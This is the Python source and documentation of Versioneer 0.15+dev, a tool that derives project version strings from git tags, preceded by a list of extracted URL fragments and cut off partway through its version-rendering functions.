['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'sharesix.com'], ['URL', 'streamcloud.eu'], ['URL', 'self.do'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidhog.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vidto.me'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'vodlocker.com'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'self.do'], ['URL', 'hcbit.com'], ['URL', 'e.co'], ['URL', 'response.in'], ['URL', 'response.in'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'bestreams.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'xbmc.sl'], ['URL', 'self.us'], ['URL', 'self.do'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidzi.tv'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'self.do'], ['URL', 'thefile.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'filenuke.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'sharerepo.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'letwatch.us'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'thevideo.me'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'vidto.me'], ['URL', 're.fi'], ['URL', 'allmyvideos.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'realvid.net'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'uptobox.com'], ['URL', 'self.do'], ['URL', 'uptostream.com'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'r.gr'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'ADDON.ge'], ['URL', 'xbmc.sl'], ['URL', 'e.co'], ['URL', 'response.re'], ['URL', 'response.cl'], ['URL', 're.fi'], ['URL', 're.DO'], ['URL', 'response.co'], ['URL', 'response.ms'], ['URL', 'response.in'], ['URL', 'self.parent.er']]" +108," +# Version: 0.15+dev + +""""""The Versioneer - like a rocketeer, but for versions. + +The Versioneer +============== + +* like a rocketeer, but for versions! +* https://github.com/warner/python-versioneer +* Brian Warner +* License: Public Domain +* Compatible With: python2.6, 2.7, 3.2, 3.3, 3.4, and pypy +* [![Latest Version] +(https://pypip.in/version/versioneer/badge.svg?style=flat) +](https://pypi.python.org/pypi/versioneer/) +* [![Build Status] +(https://travis-ci.org/warner/python-versioneer.png?branch=master) +](https://travis-ci.org/warner/python-versioneer) + +This is a tool for managing a recorded version number in distutils-based +python projects. The goal is to remove the tedious and error-prone ""update +the embedded version string"" step from your release process. Making a new +release should be as easy as recording a new tag in your version-control +system, and maybe making new tarballs. + + +## Quick Install + +* `pip install versioneer` to somewhere to your $PATH +* add a `[versioneer]` section to your setup.cfg (see below) +* run `versioneer install` in your source tree, commit the results + +## Version Identifiers + +Source trees come from a variety of places: + +* a version-control system checkout (mostly used by developers) +* a nightly tarball, produced by build automation +* a snapshot tarball, produced by a web-based VCS browser, like github's + ""tarball from tag"" feature +* a release tarball, produced by ""setup.py sdist"", distributed through PyPI + +Within each source tree, the version identifier (either a string or a number, +this tool is format-agnostic) can come from a variety of places: + +* ask the VCS tool itself, e.g. ""git describe"" (for checkouts), which knows + about recent ""tags"" and an absolute revision-id +* the name of the directory into which the tarball was unpacked +* an expanded VCS keyword ($Id$, etc) +* a `_version.py` created by some earlier build step + +For released software, the version identifier is closely related to a VCS +tag. Some projects use tag names that include more than just the version +string (e.g. ""myproject-1.2"" instead of just ""1.2""), in which case the tool +needs to strip the tag prefix to extract the version identifier. For +unreleased software (between tags), the version identifier should provide +enough information to help developers recreate the same tree, while also +giving them an idea of roughly how old the tree is (after version 1.2, before +version 1.3). Many VCS systems can report a description that captures this, +for example `git describe --tags --dirty --always` reports things like +""0.7-1-g574ab98-dirty"" to indicate that the checkout is one revision past the +0.7 tag, has a unique revision id of ""574ab98"", and is ""dirty"" (it has +uncommitted changes. + +The version identifier is used for multiple purposes: + +* to allow the module to self-identify its version: `myproject.__version__` +* to choose a name and prefix for a 'setup.py sdist' tarball + +## Theory of Operation + +Versioneer works by adding a special `_version.py` file into your source +tree, where your `__init__.py` can import it. This `_version.py` knows how to +dynamically ask the VCS tool for version information at import time. + +`_version.py` also contains `$Revision$` markers, and the installation +process marks `_version.py` to have this marker rewritten with a tag name +during the `git archive` command. As a result, generated tarballs will +contain enough information to get the proper version. + +To allow `setup.py` to compute a version too, a `versioneer.py` is added to +the top level of your source tree, next to `setup.py` and the `setup.cfg` +that configures it. This overrides several distutils/setuptools commands to +compute the version when invoked, and changes `setup.py build` and `setup.py +sdist` to replace `_version.py` with a small static file that contains just +the generated version data. + +## Installation + +First, decide on values for the following configuration variables: + +* `VCS`: the version control system you use. Currently accepts ""git"". + +* `style`: the style of version string to be produced. See ""Styles"" below for + details. Defaults to ""pep440"", which looks like + `TAG[+DISTANCE.gSHORTHASH[.dirty]]`. + +* `versionfile_source`: + + A project-relative pathname into which the generated version strings should + be written. This is usually a `_version.py` next to your project's main + `__init__.py` file, so it can be imported at runtime. If your project uses + `src/myproject/__init__.py`, this should be `src/myproject/_version.py`. + This file should be checked in to your VCS as usual: the copy created below + by `setup.py setup_versioneer` will include code that parses expanded VCS + keywords in generated tarballs. The 'build' and 'sdist' commands will + replace it with a copy that has just the calculated version string. + + This must be set even if your project does not have any modules (and will + therefore never import `_version.py`), since ""setup.py sdist"" -based trees + still need somewhere to record the pre-calculated version strings. Anywhere + in the source tree should do. If there is a `__init__.py` next to your + `_version.py`, the `setup.py setup_versioneer` command (described below) + will append some `__version__`-setting assignments, if they aren't already + present. + +* `versionfile_build`: + + Like `versionfile_source`, but relative to the build directory instead of + the source directory. These will differ when your setup.py uses + 'package_dir='. If you have `package_dir={'myproject': 'src/myproject'}`, + then you will probably have `versionfile_build='myproject/_version.py'` and + `versionfile_source='src/myproject/_version.py'`. + + If this is set to None, then `setup.py build` will not attempt to rewrite + any `_version.py` in the built tree. If your project does not have any + libraries (e.g. if it only builds a script), then you should use + `versionfile_build = None`. To actually use the computed version string, + your `setup.py` will need to override `distutils.command.build_scripts` + with a subclass that explicitly inserts a copy of + `versioneer.get_version()` into your script file. See + `test/demoapp-script-only/setup.py` for an example. + +* `tag_prefix`: + + a string, like 'PROJECTNAME-', which appears at the start of all VCS tags. + If your tags look like 'myproject-1.2.0', then you should use + tag_prefix='myproject-'. If you use unprefixed tags like '1.2.0', this + should be an empty string, using either `tag_prefix=` or `tag_prefix=''`. + +* `parentdir_prefix`: + + a optional string, frequently the same as tag_prefix, which appears at the + start of all unpacked tarball filenames. If your tarball unpacks into + 'myproject-1.2.0', this should be 'myproject-'. To disable this feature, + just omit the field from your `setup.cfg`. + +This tool provides one script, named `versioneer`. That script has one mode, +""install"", which writes a copy of `versioneer.py` into the current directory +and runs `versioneer.py setup` to finish the installation. + +To versioneer-enable your project: + +* 1: Modify your `setup.cfg`, adding a section named `[versioneer]` and + populating it with the configuration values you decided earlier (note that + the option names are not case-sensitive): + + ```` + [versioneer] + VCS = git + style = pep440 + versionfile_source = src/myproject/_version.py + versionfile_build = myproject/_version.py + tag_prefix = + parentdir_prefix = myproject- + ```` + +* 2: Run `versioneer install`. This will do the following: + + * copy `versioneer.py` into the top of your source tree + * create `_version.py` in the right place (`versionfile_source`) + * modify your `__init__.py` (if one exists next to `_version.py`) to define + `__version__` (by calling a function from `_version.py`) + * modify your `MANIFEST.in` to include both `versioneer.py` and the + generated `_version.py` in sdist tarballs + + `versioneer install` will complain about any problems it finds with your + `setup.py` or `setup.cfg`. Run it multiple times until you have fixed all + the problems. + +* 3: add a `import versioneer` to your setup.py, and add the following + arguments to the setup() call: + + version=versioneer.get_version(), + cmdclass=versioneer.get_cmdclass(), + +* 4: commit these changes to your VCS. To make sure you won't forget, + `versioneer install` will mark everything it touched for addition using + `git add`. Don't forget to add `setup.py` and `setup.cfg` too. + +## Post-Installation Usage + +Once established, all uses of your tree from a VCS checkout should get the +current version string. All generated tarballs should include an embedded +version string (so users who unpack them will not need a VCS tool installed). + +If you distribute your project through PyPI, then the release process should +boil down to two steps: + +* 1: git tag 1.0 +* 2: python setup.py register sdist upload + +If you distribute it through github (i.e. users use github to generate +tarballs with `git archive`), the process is: + +* 1: git tag 1.0 +* 2: git push; git push --tags + +Versioneer will report ""0+untagged.NUMCOMMITS.gHASH"" until your tree has at +least one tag in its history. + +## Version-String Flavors + +Code which uses Versioneer can learn about its version string at runtime by +importing `_version` from your main `__init__.py` file and running the +`get_versions()` function. From the ""outside"" (e.g. in `setup.py`), you can +import the top-level `versioneer.py` and run `get_versions()`. + +Both functions return a dictionary with different flavors of version +information: + +* `['version']`: A condensed version string, rendered using the selected + style. This is the most commonly used value for the project's version + string. The default ""pep440"" style yields strings like `0.11`, + `0.11+2.g1076c97`, or `0.11+2.g1076c97.dirty`. See the ""Styles"" section + below for alternative styles. + +* `['full-revisionid']`: detailed revision identifier. For Git, this is the + full SHA1 commit id, e.g. ""PI:KEY"". + +* `['dirty']`: a boolean, True if the tree has uncommitted changes. Note that + this is only accurate if run in a VCS checkout, otherwise it is likely to + be False or None + +* `['error']`: if the version string could not be computed, this will be set + to a string describing the problem, otherwise it will be None. It may be + useful to throw an exception in setup.py if this is set, to avoid e.g. + creating tarballs with a version string of ""unknown"". + +Some variants are more useful than others. Including `full-revisionid` in a +bug report should allow developers to reconstruct the exact code being tested +(or indicate the presence of local changes that should be shared with the +developers). `version` is suitable for display in an ""about"" box or a CLI +`--version` output: it can be easily compared against release notes and lists +of bugs fixed in various releases. + +The installer adds the following text to your `__init__.py` to place a basic +version in `YOURPROJECT.__version__`: + + from ._version import get_versions + __version__ = get_versions()['version'] + del get_versions + +## Styles + +The setup.cfg `style=` configuration controls how the VCS information is +rendered into a version string. + +The default style, ""pep440"", produces a PEP440-compliant string, equal to the +un-prefixed tag name for actual releases, and containing an additional ""local +version"" section with more detail for in-between builds. For Git, this is +TAG[+DISTANCE.gHEX[.dirty]] , using information from `git describe --tags +--dirty --always`. For example ""0.11+2.g1076c97.dirty"" indicates that the +tree is like the ""1076c97"" commit but has uncommitted changes ("".dirty""), and +that this commit is two revisions (""+2"") beyond the ""0.11"" tag. For released +software (exactly equal to a known tag), the identifier will only contain the +stripped tag, e.g. ""0.11"". + +Other styles are available. See details.md in the Versioneer source tree for +descriptions. + +## Debugging + +Versioneer tries to avoid fatal errors: if something goes wrong, it will tend +to return a version of ""0+unknown"". To investigate the problem, run `setup.py +version`, which will run the version-lookup code in a verbose mode, and will +display the full contents of `get_versions()` (including the `error` string, +which may help identify what went wrong). + +## Updating Versioneer + +To upgrade your project to a new release of Versioneer, do the following: + +* install the new Versioneer (`pip install -U versioneer` or equivalent) +* edit `setup.cfg`, if necessary, to include any new configuration settings + indicated by the release notes +* re-run `versioneer install` in your source tree, to replace + `SRC/_version.py` +* commit any changed files + +### Upgrading to 0.15 + +Starting with this version, Versioneer is configured with a `[versioneer]` +section in your `setup.cfg` file. Earlier versions required the `setup.py` to +set attributes on the `versioneer` module immediately after import. The new +version will refuse to run (raising an exception during import) until you +have provided the necessary `setup.cfg` section. + +In addition, the Versioneer package provides an executable named +`versioneer`, and the installation process is driven by running `versioneer +install`. In 0.14 and earlier, the executable was named +`versioneer-installer` and was run without an argument. + +### Upgrading to 0.14 + +0.14 changes the format of the version string. 0.13 and earlier used +hyphen-separated strings like ""0.11-2-g1076c97-dirty"". 0.14 and beyond use a +plus-separated ""local version"" section strings, with dot-separated +components, like ""0.11+2.g1076c97"". PEP440-strict tools did not like the old +format, but should be ok with the new one. + +### Upgrading from 0.11 to 0.12 + +Nothing special. + +### Upgrading from 0.10 to 0.11 + +You must add a `versioneer.VCS = ""git""` to your `setup.py` before re-running +`setup.py setup_versioneer`. This will enable the use of additional +version-control systems (SVN, etc) in the future. + +## Future Directions + +This tool is designed to make it easily extended to other version-control +systems: all VCS-specific components are in separate directories like +src/git/ . The top-level `versioneer.py` script is assembled from these +components by running make-versioneer.py . In the future, make-versioneer.py +will take a VCS name as an argument, and will construct a version of +`versioneer.py` that is specific to the given VCS. It might also take the +configuration arguments that are currently provided manually during +installation by editing setup.py . Alternatively, it might go the other +direction and include code from all supported VCS systems, reducing the +number of intermediate scripts. + + +## License + +To make Versioneer easier to embed, all its code is dedicated to the public +domain. The `_version.py` that it creates is also in the public domain. +Specifically, both are released under the Creative Commons ""Public Domain +Dedication"" license (CC0-1.0), as described in +https://creativecommons.org/publicdomain/zero/1.0/ . + +"""""" + +from __future__ import print_function +try: + import configparser +except ImportError: + import ConfigParser as configparser +import errno +import json +import os +import re +import subprocess +import sys + + +class VersioneerConfig: + + """"""Container for Versioneer configuration parameters."""""" + + +def get_root(): + """"""Get the project root directory. + + We require that all commands are run from the project root, i.e. the + directory that contains setup.py, setup.cfg, and versioneer.py . + """""" + root = os.path.realpath(os.path.abspath(os.getcwd())) + setup_py = os.path.join(root, ""setup.py"") + versioneer_py = os.path.join(root, ""versioneer.py"") + if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)): + # allow 'python path/to/setup.py COMMAND' + root = os.path.dirname(os.path.realpath(os.path.abspath(sys.argv[0]))) + setup_py = os.path.join(root, ""setup.py"") + versioneer_py = os.path.join(root, ""versioneer.py"") + if not (os.path.exists(setup_py) or os.path.exists(versioneer_py)): + err = (""Versioneer was unable to run the project root directory. "" + ""Versioneer requires setup.py to be executed from "" + ""its immediate directory (like 'python setup.py COMMAND'), "" + ""or in a way that lets it use sys.argv[0] to find the root "" + ""(like 'python path/to/setup.py COMMAND')."") + raise VersioneerBadRootError(err) + try: + # Certain runtime workflows (setup.py install/develop in a setuptools + # tree) execute all dependencies in a single python process, so + # ""versioneer"" may be imported multiple times, and python's shared + # module-import table will cache the first one. So we can't use + # os.path.dirname(__file__), as that will find whichever + # versioneer.py was first imported, even in later projects. + me = os.path.realpath(os.path.abspath(__file__)) + if os.path.splitext(me)[0] != os.path.splitext(versioneer_py)[0]: + print(""Warning: build in %s is using versioneer.py from %s"" + % (os.path.dirname(me), versioneer_py)) + except NameError: + pass + return root + + +def get_config_from_root(root): + """"""Read the project setup.cfg file to determine Versioneer config."""""" + # This might raise EnvironmentError (if setup.cfg is missing), or + # configparser.NoSectionError (if it lacks a [versioneer] section), or + # configparser.NoOptionError (if it lacks ""VCS=""). See the docstring at + # the top of versioneer.py for instructions on writing your setup.cfg . + setup_cfg = os.path.join(root, ""setup.cfg"") + parser = configparser.SafeConfigParser() + with open(setup_cfg, ""r"") as f: + parser.readfp(f) + VCS = parser.get(""versioneer"", ""VCS"") # mandatory + + def get(parser, name): + if parser.has_option(""versioneer"", name): + return parser.get(""versioneer"", name) + return None + cfg = VersioneerConfig() + cfg.VCS = VCS + cfg.style = get(parser, ""style"") or """" + cfg.versionfile_source = get(parser, ""versionfile_source"") + cfg.versionfile_build = get(parser, ""versionfile_build"") + cfg.tag_prefix = get(parser, ""tag_prefix"") + if cfg.tag_prefix in (""''"", '""""'): + cfg.tag_prefix = """" + cfg.parentdir_prefix = get(parser, ""parentdir_prefix"") + cfg.verbose = get(parser, ""verbose"") + return cfg + + +class NotThisMethod(Exception): + + """"""Exception raised if a method is not valid for the current scenario."""""" + +# these dictionaries contain VCS-specific tools +LONG_VERSION_PY = {} +HANDLERS = {} + + +def register_vcs_handler(vcs, method): # decorator + """"""Decorator to mark a method as the handler for a particular VCS."""""" + def decorate(f): + """"""Store f in HANDLERS[vcs][method]."""""" + if vcs not in HANDLERS: + HANDLERS[vcs] = {} + HANDLERS[vcs][method] = f + return f + return decorate + + +def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): + """"""Call the given command(s)."""""" + assert isinstance(commands, list) + p = None + for c in commands: + try: + dispcmd = str([c] + args) + # remember shell=False, so use git.cmd on windows, not just git + p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, + stderr=(subprocess.PIPE if hide_stderr + else None)) + break + except EnvironmentError: + e = sys.exc_info()[1] + if e.errno == errno.ENOENT: + continue + if verbose: + print(""unable to run %s"" % dispcmd) + print(e) + return None + else: + if verbose: + print(""unable to find command, tried %s"" % (commands,)) + return None + stdout = p.communicate()[0].strip() + if sys.version_info[0] >= 3: + stdout = stdout.decode() + if p.returncode != 0: + if verbose: + print(""unable to run %s (error)"" % dispcmd) + return None + return stdout +LONG_VERSION_PY['git'] = r''' +# This file helps to compute a version number in source trees obtained from +# git-archive tarball (such as those provided by githubs download-from-tag +# feature). Distribution tarballs (built by setup.py sdist) and build +# directories (produced by setup.py build) will contain a much shorter file +# that just contains the computed version number. + +# This file is released into the public domain. Generated by +# versioneer-0.15+dev (https://github.com/warner/python-versioneer) + +""""""Git implementation of _version.py."""""" + +import errno +import os +import re +import subprocess +import sys + + +def get_keywords(): + """"""Get the keywords needed to look up the version information."""""" + # these strings will be replaced by git during git-archive. + # setup.py/versioneer.py will grep for the variable names, so they must + # each be defined on a line of their own. _version.py will just call + # get_keywords(). + git_refnames = ""%(DOLLAR)sFormat:%%d%(DOLLAR)s"" + git_full = ""%(DOLLAR)sFormat:%%H%(DOLLAR)s"" + keywords = {""refnames"": git_refnames, ""full"": git_full} + return keywords + + +class VersioneerConfig: + + """"""Container for Versioneer configuration parameters."""""" + + +def get_config(): + """"""Create, populate and return the VersioneerConfig() object."""""" + # these strings are filled in when 'setup.py versioneer' creates + # _version.py + cfg = VersioneerConfig() + cfg.VCS = ""git"" + cfg.style = ""%(STYLE)s"" + cfg.tag_prefix = ""%(TAG_PREFIX)s"" + cfg.parentdir_prefix = ""%(PARENTDIR_PREFIX)s"" + cfg.versionfile_source = ""%(VERSIONFILE_SOURCE)s"" + cfg.verbose = False + return cfg + + +class NotThisMethod(Exception): + + """"""Exception raised if a method is not valid for the current scenario."""""" + + +LONG_VERSION_PY = {} +HANDLERS = {} + + +def register_vcs_handler(vcs, method): # decorator + """"""Decorator to mark a method as the handler for a particular VCS."""""" + def decorate(f): + """"""Store f in HANDLERS[vcs][method]."""""" + if vcs not in HANDLERS: + HANDLERS[vcs] = {} + HANDLERS[vcs][method] = f + return f + return decorate + + +def run_command(commands, args, cwd=None, verbose=False, hide_stderr=False): + """"""Call the given command(s)."""""" + assert isinstance(commands, list) + p = None + for c in commands: + try: + dispcmd = str([c] + args) + # remember shell=False, so use git.cmd on windows, not just git + p = subprocess.Popen([c] + args, cwd=cwd, stdout=subprocess.PIPE, + stderr=(subprocess.PIPE if hide_stderr + else None)) + break + except EnvironmentError: + e = sys.exc_info()[1] + if e.errno == errno.ENOENT: + continue + if verbose: + print(""unable to run %%s"" %% dispcmd) + print(e) + return None + else: + if verbose: + print(""unable to find command, tried %%s"" %% (commands,)) + return None + stdout = p.communicate()[0].strip() + if sys.version_info[0] >= 3: + stdout = stdout.decode() + if p.returncode != 0: + if verbose: + print(""unable to run %%s (error)"" %% dispcmd) + return None + return stdout + + +def versions_from_parentdir(parentdir_prefix, root, verbose): + """"""Try to determine the version from the parent directory name. + + Source tarballs conventionally unpack into a directory that includes + both the project name and a version string. + """""" + dirname = os.path.basename(root) + if not dirname.startswith(parentdir_prefix): + if verbose: + print(""guessing rootdir is '%%s', but '%%s' doesn't start with "" + ""prefix '%%s'"" %% (root, dirname, parentdir_prefix)) + raise NotThisMethod(""rootdir doesn't start with parentdir_prefix"") + return {""version"": dirname[len(parentdir_prefix):], + ""full-revisionid"": None, + ""dirty"": False, ""error"": None} + + +@register_vcs_handler(""git"", ""get_keywords"") +def git_get_keywords(versionfile_abs): + """"""Extract version information from the given file."""""" + # the code embedded in _version.py can just fetch the value of these + # keywords. When used from setup.py, we don't want to import _version.py, + # so we do it with a regexp instead. This function is not used from + # _version.py. + keywords = {} + try: + f = open(versionfile_abs, ""r"") + for line in f.readlines(): + if line.strip().startswith(""git_refnames =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""refnames""] = mo.group(1) + if line.strip().startswith(""git_full =""): + mo = re.search(r'=\s*""(.*)""', line) + if mo: + keywords[""full""] = mo.group(1) + f.close() + except EnvironmentError: + pass + return keywords + + +@register_vcs_handler(""git"", ""keywords"") +def git_versions_from_keywords(keywords, tag_prefix, verbose): + """"""Get version information from git keywords."""""" + if not keywords: + raise NotThisMethod(""no keywords at all, weird"") + refnames = keywords[""refnames""].strip() + if refnames.startswith(""$Format""): + if verbose: + print(""keywords are unexpanded, not using"") + raise NotThisMethod(""unexpanded keywords, not a git-archive tarball"") + refs = [r.strip() for r in refnames.strip(""()"").split("","")] + # starting in git-1.8.3, tags are listed as ""tag: foo-1.0"" instead of + # just ""foo-1.0"". If we see a ""tag: "" prefix, prefer those. + TAG = ""tag: "" + tags = set([r[len(TAG):] for r in refs if r.startswith(TAG)]) + if not tags: + # Either we're using git < 1.8.3, or there really are no tags. We use + # a heuristic: assume all version tags have a digit. The old git %%d + # expansion behaves like git log --decorate=short and strips out the + # refs/heads/ and refs/tags/ prefixes that would let us distinguish + # between branches and tags. By ignoring refnames without digits, we + # filter out many common branch names like ""release"" and + # ""stabilization"", as well as ""HEAD"" and ""master"". + tags = set([r for r in refs if re.search(r'\d', r)]) + if verbose: + print(""discarding '%%s', no digits"" %% "","".join(set(refs) - tags)) + if verbose: + print(""likely tags: %%s"" %% "","".join(sorted(tags))) + for ref in sorted(tags): + # sorting will prefer e.g. ""2.0"" over ""2.0rc1"" + if ref.startswith(tag_prefix): + r = ref[len(tag_prefix):] + if verbose: + print(""picking %%s"" %% r) + return {""version"": r, + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": None, ""branch"": None + } + # no suitable tags, so version is ""0+unknown"", but full hex is still there + if verbose: + print(""no suitable tags, using unknown + full revision id"") + return {""version"": ""0+unknown"", + ""full-revisionid"": keywords[""full""].strip(), + ""dirty"": False, ""error"": ""no suitable tags"", + ""branch"": None} + + +@register_vcs_handler(""git"", ""pieces_from_vcs"") +def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command): + """"""Get version from 'git describe' in the root of the source tree. + + This only gets called if the git-archive 'subst' keywords were *not* + expanded, and _version.py hasn't already been rewritten with a short + version string, meaning we're inside a checked out source tree. + """""" + if not os.path.exists(os.path.join(root, "".git"")): + if verbose: + print(""no .git in %%s"" %% root) + raise NotThisMethod(""no .git directory"") + + GITS = [""git""] + if sys.platform == ""win32"": + GITS = [""git.cmd"", ""git.exe""] + # if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty] + # if there isn't one, this yields HEX[-dirty] (no NUM). Note, for git v1.7 + # and below, it is necessary to run ""git update-index --refresh"" first. + describe_out = run_command(GITS, [""describe"", ""--tags"", ""--dirty"", + ""--always"", ""--long"", + ""--match"", ""%%s*"" %% tag_prefix], + cwd=root) + # --long was added in git-1.5.5 + if describe_out is None: + raise NotThisMethod(""'git describe' failed"") + describe_out = describe_out.strip() + full_out = run_command(GITS, [""rev-parse"", ""HEAD""], cwd=root) + if full_out is None: + raise NotThisMethod(""'git rev-parse' failed"") + full_out = full_out.strip() + + pieces = {} + pieces[""long""] = full_out + pieces[""short""] = full_out[:7] # maybe improved later + pieces[""error""] = None + + # abbrev-ref available with git >= 1.7 + branch_name = run_command(GITS, [""rev-parse"", ""--abbrev-ref"", ""HEAD""], + cwd=root).strip() + if branch_name == 'HEAD': + branches = run_command(GITS, [""branch"", ""--contains""], + cwd=root).split('\n') + branches = [branch[2:] for branch in branches if branch[4:5] != '('] + if 'master' in branches: + branch_name = 'master' + elif not branches: + branch_name = None + else: + # Pick the first branch that is returned. Good or bad. + branch_name = branches[0] + + pieces['branch'] = branch_name + + # parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty] + # TAG might have hyphens. + git_describe = describe_out + + # look for -dirty suffix + dirty = git_describe.endswith(""-dirty"") + pieces[""dirty""] = dirty + if dirty: + git_describe = git_describe[:git_describe.rindex(""-dirty"")] + + # now we have TAG-NUM-gHEX or HEX + + if ""-"" in git_describe: + # TAG-NUM-gHEX + mo = re.search(r'^(.+)-(\d+)-g([0-9a-f]+)$', git_describe) + if not mo: + # unparseable. Maybe git-describe is misbehaving? + pieces[""error""] = (""unable to parse git-describe output: '%%s'"" + %% describe_out) + return pieces + + # tag + full_tag = mo.group(1) + if not full_tag.startswith(tag_prefix): + if verbose: + fmt = ""tag '%%s' doesn't start with prefix '%%s'"" + print(fmt %% (full_tag, tag_prefix)) + pieces[""error""] = (""tag '%%s' doesn't start with prefix '%%s'"" + %% (full_tag, tag_prefix)) + return pieces + pieces[""closest-tag""] = full_tag[len(tag_prefix):] + + # distance: number of commits since tag + pieces[""distance""] = int(mo.group(2)) + + # commit: short hex revision ID + pieces[""short""] = mo.group(3) + + else: + # HEX: no tags + pieces[""closest-tag""] = None + count_out = run_command(GITS, [""rev-list"", ""HEAD"", ""--count""], + cwd=root) + pieces[""distance""] = int(count_out) # total number of commits + + return pieces + + +# Default matches v1.2.x, maint/1.2.x, 1.2.x, 1.x etc. +default_maint_branch_regexp = "".*([0-9]+\.)+x$"" + + +def plus_or_dot(pieces): + """"""Return a + if we don't already have one, else return a ."""""" + if ""+"" in pieces.get(""closest-tag"", """"): + return ""."" + return ""+"" + + +def render_pep440(pieces): + """"""Build up version string, with post-release ""local version identifier"". + + Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you + get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty + + Exceptions: + 1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += plus_or_dot(pieces) + rendered += ""%%d.g%%s"" %% (pieces[""distance""], pieces[""short""]) + if pieces[""dirty""]: + rendered += "".dirty"" + else: + # exception #1 + rendered = ""0+untagged.%%d.g%%s"" %% (pieces[""distance""], + pieces[""short""]) + if pieces[""dirty""]: + rendered += "".dirty"" + return rendered + + +def render_pep440_pre(pieces): + """"""TAG[.post.devDISTANCE] -- No -dirty. + + Exceptions: + 1: no tags. 0.post.devDISTANCE + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""]: + rendered += "".post.dev%%d"" %% pieces[""distance""] + else: + # exception #1 + rendered = ""0.post.dev%%d"" %% pieces[""distance""] + return rendered + + +def render_pep440_post(pieces): + """"""TAG[.postDISTANCE[.dev0]+gHEX] . + + The "".dev0"" means dirty. Note that .dev0 sorts backwards + (a dirty tree will appear ""older"" than the corresponding clean one), + but you shouldn't be releasing software with -dirty anyways. + + Exceptions: + 1: no tags. 0.postDISTANCE[.dev0] + """""" + if pieces[""closest-tag""]: + rendered = pieces[""closest-tag""] + if pieces[""distance""] or pieces[""dirty""]: + rendered += "".post%%d"" %% pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + rendered += plus_or_dot(pieces) + rendered += ""g%%s"" %% pieces[""short""] + else: + # exception #1 + rendered = ""0.post%%d"" %% pieces[""distance""] + if pieces[""dirty""]: + rendered += "".dev0"" + rendered += ""+g%%s"" %% pieces[""short""] + return rendered + + +def render_pep440_old(pieces): + 